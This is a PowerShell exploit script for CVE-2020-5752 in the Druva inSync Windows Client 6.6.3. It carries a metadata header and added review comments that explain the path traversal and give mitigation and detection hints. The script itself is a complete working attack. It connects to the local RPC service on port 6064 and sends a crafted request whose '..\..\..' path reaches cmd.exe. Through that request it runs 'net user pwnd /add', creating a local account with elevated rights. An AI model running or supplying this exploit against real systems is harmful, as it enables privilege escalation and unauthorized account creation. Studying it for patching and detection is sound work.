# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
# Date: 2020-12-03
# Exploit Author: 1F98D
# Original Author: Matteo Malvica
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
# Version: 6.6.3
# Tested on: Windows 10 (x64)
# CVE: CVE-2020-5752
# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/

# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.
#
# NOTE(review): what this script demonstrates, read from a defensive angle.
# The request it builds is: a fixed ASCII header, a 4-byte request type,
# a 4-byte payload length, and a UTF-16LE payload. The payload is a path
# that begins under C:\ProgramData\Druva\inSync4\ but contains "..\..\.."
# so that it resolves to cmd.exe instead - this is the path-traversal
# weakness the reference above describes; a prefix check on the executable
# path is not sufficient validation, the path must be canonicalised first.
# The privilege-escalation claim in the title rests on the listening
# service executing the payload with higher privilege than the caller;
# that is not visible in this file - confirm against the reference.
# Mitigation: apply the vendor fix for CVE-2020-5752. Detection: look for
# connections to 127.0.0.1:6064 from processes other than the inSync
# client, and for cmd.exe (or "net user") spawned by the inSync service.

# Turn PowerShell's non-terminating errors into terminating ones so the
# script aborts at the first failed step instead of sending a partial request.
$ErrorActionPreference = "Stop"

# The command the service is coerced into running. "net user ... /add"
# creates a local account and only succeeds when run with sufficient rights.
$cmd = "net user pwnd /add"

# Plain TCP stream socket (IPv4).
$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)

# The inSync client RPC service listens on the loopback interface, port 6064.
$s.Connect("127.0.0.1", 6064)

# Protocol header identifying the RPC dialect/version, as ASCII/UTF-8.
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")

# Request type 5 as four bytes: 0x05 followed by three NUL characters
# (`0 is PowerShell's NUL escape). Presumably the "execute" request type -
# see the reference for the protocol details.
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")

# Payload: the executable path plus arguments, UTF-16LE encoded ("Unicode"
# in .NET terms). The "..\..\.." segments escape the inSync4 directory that
# the service appears to expect the path to stay within.
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");

# Byte length of the payload as a 4-byte integer in host byte order
# (little-endian on the x64 target named in the header comments).
$length = [System.BitConverter]::GetBytes($command.Length);

# Send the four parts in protocol order. The socket is never closed or
# disposed; acceptable for a one-shot script, but note it if reusing this.
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)